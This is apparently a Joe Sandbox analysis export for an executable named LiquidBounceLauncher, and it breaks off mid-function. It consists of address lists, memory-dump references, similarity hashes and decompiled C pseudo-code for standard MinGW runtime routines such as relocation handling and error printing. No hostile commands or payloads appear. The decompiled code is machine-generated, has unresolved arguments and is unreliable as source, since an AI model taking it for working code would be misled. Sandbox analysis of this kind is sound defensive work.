                                                                                                                                                                                      0x0043ab79
                                                                                                                                                                                      0x0043ab79
                                                                                                                                                                                      0x0043ab82
                                                                                                                                                                                      0x0043ab87
                                                                                                                                                                                      0x0043ab8f
                                                                                                                                                                                      0x0043ab91
                                                                                                                                                                                      0x0043ab94
                                                                                                                                                                                      0x0043ab99
                                                                                                                                                                                      0x0043ab9c
                                                                                                                                                                                      0x0043aba2
                                                                                                                                                                                      0x0043aba7
                                                                                                                                                                                      0x0043aba9
                                                                                                                                                                                      0x0043abac
                                                                                                                                                                                      0x0043abaf
                                                                                                                                                                                      0x0043abb5
                                                                                                                                                                                      0x0043ad75
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0043ad7b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0043ad7b
                                                                                                                                                                                      0x0043acd1
                                                                                                                                                                                      0x0043acda
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0043abbb
                                                                                                                                                                                      0x0043abbb
                                                                                                                                                                                      0x0043abbb
                                                                                                                                                                                      0x0043abc0
                                                                                                                                                                                      0x0043abc5
                                                                                                                                                                                      0x0043abc7
                                                                                                                                                                                      0x0043abc7
                                                                                                                                                                                      0x0043abca
                                                                                                                                                                                      0x0043abcd
                                                                                                                                                                                      0x0043abd1
                                                                                                                                                                                      0x0043abd3
                                                                                                                                                                                      0x0043abdc
                                                                                                                                                                                      0x0043adad
                                                                                                                                                                                      0x0043adb4
                                                                                                                                                                                      0x0043adb7
                                                                                                                                                                                      0x0043adb7
                                                                                                                                                                                      0x0043abea
                                                                                                                                                                                      0x0043abef
                                                                                                                                                                                      0x0043abf4
                                                                                                                                                                                      0x0043abf7
                                                                                                                                                                                      0x0043abfd
                                                                                                                                                                                      0x0043ac02
                                                                                                                                                                                      0x0043ac05
                                                                                                                                                                                      0x0043ac0a
                                                                                                                                                                                      0x0043ac0a
                                                                                                                                                                                      0x0043ac0c
                                                                                                                                                                                      0x0043ac0f
                                                                                                                                                                                      0x0043ac15
                                                                                                                                                                                      0x0043ac18
                                                                                                                                                                                      0x0043ad25
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0043ad2b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0043ad2b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0043ac1e
                                                                                                                                                                                      0x0043ac1e
                                                                                                                                                                                      0x0043ac1e
                                                                                                                                                                                      0x0043ac23
                                                                                                                                                                                      0x0043ac28
                                                                                                                                                                                      0x0043ac2a
                                                                                                                                                                                      0x0043ac2a
                                                                                                                                                                                      0x0043ac2d
                                                                                                                                                                                      0x0043ac30
                                                                                                                                                                                      0x0043ac34
                                                                                                                                                                                      0x0043ac36
                                                                                                                                                                                      0x0043ac36
                                                                                                                                                                                      0x0043ac3f
                                                                                                                                                                                      0x0043ad30
                                                                                                                                                                                      0x0043ad37
                                                                                                                                                                                      0x0043ad3d
                                                                                                                                                                                      0x0043ad3d
                                                                                                                                                                                      0x0043ac45
                                                                                                                                                                                      0x0043ac4a
                                                                                                                                                                                      0x0043ac50
                                                                                                                                                                                      0x0043ac55
                                                                                                                                                                                      0x0043ac58
                                                                                                                                                                                      0x0043ac5e
                                                                                                                                                                                      0x0043ac63
                                                                                                                                                                                      0x0043ac65
                                                                                                                                                                                      0x0043ac68
                                                                                                                                                                                      0x0043ac6b
                                                                                                                                                                                      0x0043ac71
                                                                                                                                                                                      0x0043ac74
                                                                                                                                                                                      0x0043ad15
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0043ad1b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0043ad1b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0043ac7a
                                                                                                                                                                                      0x0043ac7a
                                                                                                                                                                                      0x0043ac7a
                                                                                                                                                                                      0x0043ac7f
                                                                                                                                                                                      0x0043ac84
                                                                                                                                                                                      0x0043ac86
                                                                                                                                                                                      0x0043ac86
                                                                                                                                                                                      0x0043ac89
                                                                                                                                                                                      0x0043ac8c
                                                                                                                                                                                      0x0043ac90
                                                                                                                                                                                      0x0043ac92
                                                                                                                                                                                      0x0043ac92
                                                                                                                                                                                      0x0043ac9b
                                                                                                                                                                                      0x0043ad50
                                                                                                                                                                                      0x0043ad57
                                                                                                                                                                                      0x0043ad5d
                                                                                                                                                                                      0x0043ad5d
                                                                                                                                                                                      0x0043aca9
                                                                                                                                                                                      0x0043acaf
                                                                                                                                                                                      0x0043acb4
                                                                                                                                                                                      0x0043acb7
                                                                                                                                                                                      0x0043acbd
                                                                                                                                                                                      0x0043acc2
                                                                                                                                                                                      0x0043acc5
                                                                                                                                                                                      0x0043acc8
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0043ac0a
                                                                                                                                                                                      0x0043ab73
                                                                                                                                                                                      0x0043ab3b
                                                                                                                                                                                      0x0043a8ab
                                                                                                                                                                                      0x0043a8ab
                                                                                                                                                                                      0x0043a8af
                                                                                                                                                                                      0x0043a8b2
                                                                                                                                                                                      0x0043a8b4
                                                                                                                                                                                      0x0043a8b9
                                                                                                                                                                                      0x0043a8bc
                                                                                                                                                                                      0x0043a8c1
                                                                                                                                                                                      0x0043a8c1
                                                                                                                                                                                      0x0043a8c7
                                                                                                                                                                                      0x0043a8ca
                                                                                                                                                                                      0x0043a8cf
                                                                                                                                                                                      0x0043aa40
                                                                                                                                                                                      0x0043a8d5
                                                                                                                                                                                      0x0043a8d5
                                                                                                                                                                                      0x0043a8d5
                                                                                                                                                                                      0x0043a8db
                                                                                                                                                                                      0x0043aa10
                                                                                                                                                                                      0x0043aa18
                                                                                                                                                                                      0x0043aa20
                                                                                                                                                                                      0x0043aa22
                                                                                                                                                                                      0x0043aa2a
                                                                                                                                                                                      0x0043aa2d
                                                                                                                                                                                      0x0043aa32
                                                                                                                                                                                      0x0043aa35
                                                                                                                                                                                      0x0043aa35
                                                                                                                                                                                      0x0043a8e1
                                                                                                                                                                                      0x0043a8e8
                                                                                                                                                                                      0x0043a8ed
                                                                                                                                                                                      0x0043a8f2
                                                                                                                                                                                      0x0043a8f7
                                                                                                                                                                                      0x0043a8fd
                                                                                                                                                                                      0x0043a90c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0043a912
                                                                                                                                                                                      0x0043a916
                                                                                                                                                                                      0x0043a919
                                                                                                                                                                                      0x0043a91b
                                                                                                                                                                                      0x0043a920
                                                                                                                                                                                      0x0043a923
                                                                                                                                                                                      0x0043a929
                                                                                                                                                                                      0x0043a92c
                                                                                                                                                                                      0x0043a931
                                                                                                                                                                                      0x0043aa50
                                                                                                                                                                                      0x0043a937
                                                                                                                                                                                      0x0043a937
                                                                                                                                                                                      0x0043a937
                                                                                                                                                                                      0x0043a93d
                                                                                                                                                                                      0x0043a9e0
                                                                                                                                                                                      0x0043a9e8
                                                                                                                                                                                      0x0043a9f0
                                                                                                                                                                                      0x0043a9f2
                                                                                                                                                                                      0x0043a9fa
                                                                                                                                                                                      0x0043a9fd
                                                                                                                                                                                      0x0043aa02
                                                                                                                                                                                      0x0043aa05
                                                                                                                                                                                      0x0043aa05
                                                                                                                                                                                      0x0043a943
                                                                                                                                                                                      0x0043a94a
                                                                                                                                                                                      0x0043a94f
                                                                                                                                                                                      0x0043a95c
                                                                                                                                                                                      0x0043a962
                                                                                                                                                                                      0x0043a971
                                                                                                                                                                                      0x0043aabf
                                                                                                                                                                                      0x0043aac6
                                                                                                                                                                                      0x0043aacb
                                                                                                                                                                                      0x0043aad0
                                                                                                                                                                                      0x0043aad2
                                                                                                                                                                                      0x0043aad4
                                                                                                                                                                                      0x0043aad7
                                                                                                                                                                                      0x0043aad7
                                                                                                                                                                                      0x0043aadf
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0043a977
                                                                                                                                                                                      0x0043a977
                                                                                                                                                                                      0x0043a97b
                                                                                                                                                                                      0x0043a97e
                                                                                                                                                                                      0x0043a980
                                                                                                                                                                                      0x0043a985
                                                                                                                                                                                      0x0043a988
                                                                                                                                                                                      0x0043a98e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0043a994
                                                                                                                                                                                      0x0043a99d
                                                                                                                                                                                      0x0043a99d
                                                                                                                                                                                      0x0043a98e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0043a971
                                                                                                                                                                                      0x0043aae4
                                                                                                                                                                                      0x0043aaeb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0043aaeb
                                                                                                                                                                                      0x0043a8a5
                                                                                                                                                                                      0x0043a848
                                                                                                                                                                                      0x0043a818
                                                                                                                                                                                      0x0043a7e8
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: strlen$strcmp
                                                                                                                                                                                      • String ID: *$basic_string::append
                                                                                                                                                                                      • API String ID: 551667898-3732199748
                                                                                                                                                                                      • Opcode ID: d1a89dad95b4bdb122bff120fe2f6347b2a44f1a1d6d2c270035f6d712324d58
                                                                                                                                                                                      • Instruction ID: 98e81767c0a100a0e8dd25d86bd782d3a0c397905a47a5b75d113718517234f7
                                                                                                                                                                                      • Opcode Fuzzy Hash: d1a89dad95b4bdb122bff120fe2f6347b2a44f1a1d6d2c270035f6d712324d58
                                                                                                                                                                                      • Instruction Fuzzy Hash: BBE156B0A046018FC710EF29C18462EFBF2EF88704F51892EE4D99B351D779A855CF9A
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 00420200 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 84memoryfileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      C-Code - Quality: 18%
                                                                                                                                                                                      			E00420200(void* __ebx, char* __ecx, intOrPtr __edx, long __edi, int __esi, void* __ebp, signed char* _a4, char _a8) {
				void* _v16;
				struct _MEMORY_BASIC_INFORMATION* _v20;
				signed char* _v24;
				intOrPtr _v64;
				intOrPtr _v72;
				char* _v84;
				char* _v88;
				intOrPtr _v92;
				intOrPtr _v108;
				char* _v112;
				char** _v116;
				intOrPtr _v136;
				signed int _v160;
				intOrPtr _t57;
				int _t60;
				long _t62;
				signed char* _t64;
				void* _t66;
				void* _t67;
				intOrPtr _t68;
				void* _t69;
				void* _t78;
				char* _t79;
				intOrPtr* _t80;
				intOrPtr _t82;
				char* _t85;
				intOrPtr _t86;
				signed int* _t88;
				intOrPtr _t91;
				intOrPtr _t100;
				intOrPtr _t103;
				signed int _t104;
				signed int _t105;
				intOrPtr _t112;
				char* _t114;
				intOrPtr _t116;
				signed int _t117;
				struct _MEMORY_BASIC_INFORMATION* _t122;
				intOrPtr _t123;
				void* _t125;
				char** _t130;
				void* _t132;
				void** _t133;
				char** _t134;
				char** _t135;
				char** _t136;

				_t128 = __ebp;
				_t99 = __edx;
				_t85 = __ecx;
				_t133 = _t132 - 0x14;
				_t57 = __imp___iob;
				_v20 = 0x17;
				_v24 = 1;
				_t122 =  &_a8;
				 *_t133 = "Mingw runtime failure:\n";
				_t4 = _t57 + 0x40; // 0x76e04640
				_t78 = _t4;
				_v16 = _t78;
				fwrite(__ebx, __esi, ??, ??);
				_v20 = _t122;
				 *_t133 = _t78;
				_v24 = _a4;
				_t60 = vfprintf(??, ??, ??);
				abort();
				_push(__ebp);
				_t114 = _t85;
				_t79 = _t60;
				_t123 = _t99;
				_t134 = _t133 - 0x4c;
				_v112 = 0x1c;
				 *_t134 = _t79;
				_v116 =  &_v84;
				_t62 = VirtualQuery(_t78, _t122, __edi);
				_t135 = _t134 - 0xc;
				if(_t62 == 0) {
					_v112 = _t79;
					_v116 = 0x1c;
					 *_t135 = "  VirtualQuery failed for %d bytes at address %p";
					E00420200(_t79, _t85, _t99, _t114, _t123, __ebp);
					_t64 =  *0x519068;
					if(_t64 == 0) {
						 *0x519068 = 1;
						_t64 = 0;
						if(0x4dfdbc <= 7) {
							goto L11;
						} else {
							_push(_t114);
							_push(_t123);
							_push(_t79);
							_t136 = _t135 - 0x20;
							if(0x4dfdbc <= 0xb) {
								_t80 = 0x4dfdbc;
								goto L29;
							} else {
								_t123 =  *0x4dfdbc; // 0x0
								if(_t123 != 0) {
									L24:
									_t80 = 0x4dfdbc;
									goto L25;
								} else {
									_t82 =  *0x4dfdc0; // 0x0
									if(_t82 != 0) {
										goto L24;
									} else {
										_t85 =  *0x4dfdc4; // 0x0
										_t80 = 0x4dfdc8;
										if(_t85 == 0) {
											L29:
											_t99 =  *_t80;
											if( *_t80 != 0) {
												L25:
												while(_t80 < 0x4dfdbc) {
													_t42 = _t80 + 4; // 0x0
													_t86 =  *_t42;
													_t100 =  *_t80;
													_t80 = _t80 + 8;
													_t43 = _t86 + 0x400000; // 0x905a4d
													_t44 = _t86 + 0x400000; // 0x400000
													_t64 = _t44;
													_v136 = _t100 +  *_t43;
													L1();
												}
												goto L27;
											} else {
												_t47 = _t80 + 4; // 0x0
												_t64 =  *_t47;
												if(_t64 == 0) {
													goto L18;
												} else {
													goto L25;
												}
											}
										} else {
											_t80 = 0x4dfdbc;
											L18:
											_t34 = _t80 + 8; // 0x0
											_t64 =  *_t34;
											if(_t64 != 1) {
												_v160 = _t64;
												 *_t136 = "  Unknown pseudo relocation protocol version %d.\n";
												_t66 = E00420200(_t80, _t85, _t99, _t114, _t123, _t128);
												_push(_t85);
												_push(_t66);
												_t88 =  &_v160;
												if(_t66 >= 0x1000) {
													do {
														_t88 = _t88 - 0x1000;
														_t66 = _t66 - 0x1000;
													} while (_t66 > 0x1000);
												}
												_pop(_t67);
												return _t67;
											} else {
												while(1) {
													_t80 = _t80 + 0xc;
													if(_t80 >= 0x4dfdbc) {
														break;
													}
													_t103 =  *_t80;
													_t35 = _t80 + 4; // 0x3a434347
													_t116 =  *_t35;
													_t36 = _t103 + 0x400000; // 0x404000
													_t125 = _t36;
													_t37 = _t103 + 0x400000; // 0x3fffffd
													_t91 =  *_t37;
													_t38 = _t80 + 8; // 0x4e472820
													_t104 =  *_t38 & 0x000000ff;
													_t39 = _t116 + 0x400000; // 0x3a834347
													_t64 = _t39;
													if(_t104 == 0x10) {
														_t105 =  *(_t116 + 0x400000) & 0x0000ffff;
														if(_t105 < 0) {
															_t105 = _t105 | 0xffff0000;
														}
														_v136 = _t91 + _t105 - _t125;
														L1();
														continue;
													} else {
														if(_t104 == 0x20) {
															_v136 = _t91 - _t125 +  *_t64;
															L1();
															continue;
														} else {
															if(_t104 == 8) {
																_t117 =  *_t64 & 0x000000ff;
																if(_t117 < 0) {
																	_t117 = _t117 | 0xffffff00;
																}
																_v136 = _t91 + _t117 - _t125;
																L1();
																continue;
															} else {
																_v160 = _t104;
																 *_t136 = "  Unknown pseudo relocation bit size %d.\n";
																_v136 = 0;
																_t64 = E00420200(_t80, _t91, _t104, _t116, _t125, _t128);
																goto L24;
															}
														}
													}
													break;
												}
												L27:
												return _t64;
											}
										}
									}
								}
							}
						}
					} else {
						L11:
						return _t64;
					}
				} else {
					_t68 = _v64;
					if(_t68 == 0x40 || _t68 == 4) {
						_v112 = _t114;
						_v116 = _t123;
						 *_t135 = _t79;
						_t69 = memcpy(??, ??, ??);
						goto L5;
					} else {
						_t130 =  &_v88;
						_v112 = 0x40;
						_v108 = _t130;
						_v116 = _v72;
						 *_t135 = _v84;
						VirtualProtect(??, ??, ??, ??);
						_t135 = _t135 - 0x10;
						_v112 = _t114;
						_v116 = _t123;
						 *_t135 = _t79;
						_v92 = _v64;
						_t69 = memcpy(??, ??, ??);
						_t112 = _v92;
						if(_t112 == 0x40 || _t112 == 4) {
							L5:
							return _t69;
						} else {
							_v108 = _t130;
							_v112 = _v88;
							_v116 = _v72;
							 *_t135 = _v84;
							return VirtualProtect(??, ??, ??, ??);
						}
					}
				}
			}

















































                                                                                                                                                                                      0x00420200
                                                                                                                                                                                      0x00420200
                                                                                                                                                                                      0x00420200
                                                                                                                                                                                      0x00420202
                                                                                                                                                                                      0x00420205
                                                                                                                                                                                      0x0042020a
                                                                                                                                                                                      0x00420212
                                                                                                                                                                                      0x0042021a
                                                                                                                                                                                      0x0042021e
                                                                                                                                                                                      0x00420225
                                                                                                                                                                                      0x00420225
                                                                                                                                                                                      0x00420228
                                                                                                                                                                                      0x0042022c
                                                                                                                                                                                      0x00420235
                                                                                                                                                                                      0x00420239
                                                                                                                                                                                      0x0042023c
                                                                                                                                                                                      0x00420240
                                                                                                                                                                                      0x00420245
                                                                                                                                                                                      0x00420250
                                                                                                                                                                                      0x00420252
                                                                                                                                                                                      0x00420256
                                                                                                                                                                                      0x00420258
                                                                                                                                                                                      0x0042025a
                                                                                                                                                                                      0x00420261
                                                                                                                                                                                      0x00420269
                                                                                                                                                                                      0x0042026c
                                                                                                                                                                                      0x00420270
                                                                                                                                                                                      0x00420275
                                                                                                                                                                                      0x0042027a
                                                                                                                                                                                      0x00420328
                                                                                                                                                                                      0x0042032c
                                                                                                                                                                                      0x00420334
                                                                                                                                                                                      0x0042033b
                                                                                                                                                                                      0x00420340
                                                                                                                                                                                      0x00420347
                                                                                                                                                                                      0x00420355
                                                                                                                                                                                      0x0042035f
                                                                                                                                                                                      0x00420367
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00420369
                                                                                                                                                                                      0x00420369
                                                                                                                                                                                      0x0042036a
                                                                                                                                                                                      0x0042036b
                                                                                                                                                                                      0x0042036c
                                                                                                                                                                                      0x00420372
                                                                                                                                                                                      0x00420460
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00420378
                                                                                                                                                                                      0x00420378
                                                                                                                                                                                      0x00420380
                                                                                                                                                                                      0x00420415
                                                                                                                                                                                      0x00420415
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00420386
                                                                                                                                                                                      0x00420386
                                                                                                                                                                                      0x0042038e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00420394
                                                                                                                                                                                      0x00420394
                                                                                                                                                                                      0x0042039a
                                                                                                                                                                                      0x004203a1
                                                                                                                                                                                      0x00420465
                                                                                                                                                                                      0x00420465
                                                                                                                                                                                      0x00420469
                                                                                                                                                                                      0x0042041a
                                                                                                                                                                                      0x00420420
                                                                                                                                                                                      0x00420422
                                                                                                                                                                                      0x00420422
                                                                                                                                                                                      0x00420425
                                                                                                                                                                                      0x00420427
                                                                                                                                                                                      0x0042042a
                                                                                                                                                                                      0x00420430
                                                                                                                                                                                      0x00420430
                                                                                                                                                                                      0x0042043b
                                                                                                                                                                                      0x00420443
                                                                                                                                                                                      0x00420448
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0042046b
                                                                                                                                                                                      0x0042046b
                                                                                                                                                                                      0x0042046b
                                                                                                                                                                                      0x00420470
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00420476
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00420476
                                                                                                                                                                                      0x00420470
                                                                                                                                                                                      0x004203a7
                                                                                                                                                                                      0x004203a7
                                                                                                                                                                                      0x004203ac
                                                                                                                                                                                      0x004203ac
                                                                                                                                                                                      0x004203ac
                                                                                                                                                                                      0x004203b2
                                                                                                                                                                                      0x004204fb
                                                                                                                                                                                      0x004204ff
                                                                                                                                                                                      0x00420506
                                                                                                                                                                                      0x00420510
                                                                                                                                                                                      0x00420511
                                                                                                                                                                                      0x00420517
                                                                                                                                                                                      0x0042051b
                                                                                                                                                                                      0x0042051d
                                                                                                                                                                                      0x0042051d
                                                                                                                                                                                      0x00420526
                                                                                                                                                                                      0x0042052b
                                                                                                                                                                                      0x0042051d
                                                                                                                                                                                      0x00420537
                                                                                                                                                                                      0x00420539
                                                                                                                                                                                      0x004203b8
                                                                                                                                                                                      0x004203b8
                                                                                                                                                                                      0x004203b8
                                                                                                                                                                                      0x004203c1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004203c7
                                                                                                                                                                                      0x004203c9
                                                                                                                                                                                      0x004203c9
                                                                                                                                                                                      0x004203cc
                                                                                                                                                                                      0x004203cc
                                                                                                                                                                                      0x004203d2
                                                                                                                                                                                      0x004203d2
                                                                                                                                                                                      0x004203d8
                                                                                                                                                                                      0x004203d8
                                                                                                                                                                                      0x004203dc
                                                                                                                                                                                      0x004203dc
                                                                                                                                                                                      0x004203e5
                                                                                                                                                                                      0x00420480
                                                                                                                                                                                      0x0042048a
                                                                                                                                                                                      0x0042048c
                                                                                                                                                                                      0x0042048c
                                                                                                                                                                                      0x0042049a
                                                                                                                                                                                      0x004204a3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004203eb
                                                                                                                                                                                      0x004203ee
                                                                                                                                                                                      0x004204e8
                                                                                                                                                                                      0x004204f1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004203f4
                                                                                                                                                                                      0x004203f7
                                                                                                                                                                                      0x004204b0
                                                                                                                                                                                      0x004204b7
                                                                                                                                                                                      0x004204b9
                                                                                                                                                                                      0x004204b9
                                                                                                                                                                                      0x004204c7
                                                                                                                                                                                      0x004204d0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004203fd
                                                                                                                                                                                      0x004203fd
                                                                                                                                                                                      0x00420401
                                                                                                                                                                                      0x00420408
                                                                                                                                                                                      0x00420410
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00420410
                                                                                                                                                                                      0x004203f7
                                                                                                                                                                                      0x004203ee
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004203e5
                                                                                                                                                                                      0x00420450
                                                                                                                                                                                      0x00420456
                                                                                                                                                                                      0x00420456
                                                                                                                                                                                      0x004203b2
                                                                                                                                                                                      0x004203a1
                                                                                                                                                                                      0x0042038e
                                                                                                                                                                                      0x00420380
                                                                                                                                                                                      0x00420372
                                                                                                                                                                                      0x00420349
                                                                                                                                                                                      0x00420349
                                                                                                                                                                                      0x00420349
                                                                                                                                                                                      0x00420349
                                                                                                                                                                                      0x00420280
                                                                                                                                                                                      0x00420280
                                                                                                                                                                                      0x00420287
                                                                                                                                                                                      0x0042028e
                                                                                                                                                                                      0x00420292
                                                                                                                                                                                      0x00420296
                                                                                                                                                                                      0x00420299
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004202b0
                                                                                                                                                                                      0x004202b4
                                                                                                                                                                                      0x004202b8
                                                                                                                                                                                      0x004202c0
                                                                                                                                                                                      0x004202c4
                                                                                                                                                                                      0x004202cc
                                                                                                                                                                                      0x004202cf
                                                                                                                                                                                      0x004202d4
                                                                                                                                                                                      0x004202db
                                                                                                                                                                                      0x004202df
                                                                                                                                                                                      0x004202e3
                                                                                                                                                                                      0x004202e6
                                                                                                                                                                                      0x004202ea
                                                                                                                                                                                      0x004202ef
                                                                                                                                                                                      0x004202f6
                                                                                                                                                                                      0x0042029e
                                                                                                                                                                                      0x004202a5
                                                                                                                                                                                      0x004202fd
                                                                                                                                                                                      0x00420301
                                                                                                                                                                                      0x00420305
                                                                                                                                                                                      0x0042030d
                                                                                                                                                                                      0x00420315
                                                                                                                                                                                      0x00420327
                                                                                                                                                                                      0x00420327
                                                                                                                                                                                      0x004202f6
                                                                                                                                                                                      0x00420287

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Virtual$Protectmemcpy$Queryabortfwritevfprintf
                                                                                                                                                                                      • String ID: @$Mingw runtime failure:
                                                                                                                                                                                      • API String ID: 978211760-2549925133
                                                                                                                                                                                      • Opcode ID: 40acb3f6a4d64bc273544773778387f3e8cbb9a66e186234e6b1e0beb39fa4a1
                                                                                                                                                                                      • Instruction ID: ed314005656e2dfdf3b6482d18aa87074e2cec12fa4fe0140219bcd9a2dce196
                                                                                                                                                                                      • Opcode Fuzzy Hash: 40acb3f6a4d64bc273544773778387f3e8cbb9a66e186234e6b1e0beb39fa4a1
                                                                                                                                                                                      • Instruction Fuzzy Hash: F031C7B5A083149BD700EF29E18455FBBE4BF88758F90896EF48893311E278D944CB56
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 00424470 Relevance: 15.1, APIs: 10, Instructions: 132synchronizationCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Interlocked$Decrement$Increment$ObjectReleaseSemaphoreSingleWaitabortfree
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3320833293-0
                                                                                                                                                                                      • Opcode ID: 98277b199b57b11d9179d94692d02e44bc456ac1eaa5a1d958f88fc45a4c4f06
                                                                                                                                                                                      • Instruction ID: e9615ca0f0fd36af63b0332dc7fbc9cbe864e3008aa9cea863ac2dc53349bec1
                                                                                                                                                                                      • Opcode Fuzzy Hash: 98277b199b57b11d9179d94692d02e44bc456ac1eaa5a1d958f88fc45a4c4f06
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5B41B0717042309BDB20FF65F5847577BE4EF94708F85413ADD888B305E778E8898AAA
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 004323EB Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 33fileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      C-Code - Quality: 37%
                                                                                                                                                                                      			E004323EB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char* _t10;
				intOrPtr* _t16;
				char* _t17;
				void* _t22;
				void* _t25;
				void* _t28;
				void* _t29;
				intOrPtr _t30;
				void* _t31;
				char** _t32;

				 *_t32 = _t10;
				if(_t25 != 1) {
					L004AFAE0(_t22, _t28, _t29, _t31);
					L004AFCE0(_t28, _t29, _t31);
				} else {
					_t16 = L004AFAE0(_t22, _t28, _t29, _t31);
					_t30 = _t29 + 0x40;
					_t17 =  *((intOrPtr*)( *_t16 + 8))();
					_a12 = _t30;
					_a8 = 0xb;
					_a4 = 1;
					 *_t32 = "  what():  ";
					fwrite(??, ??, ??, ??);
					_a4 = _t30;
					 *_t32 = _t17;
					fputs(??, ??);
					_a4 = _t30;
					 *_t32 = 0xa;
					fputc(??, ??);
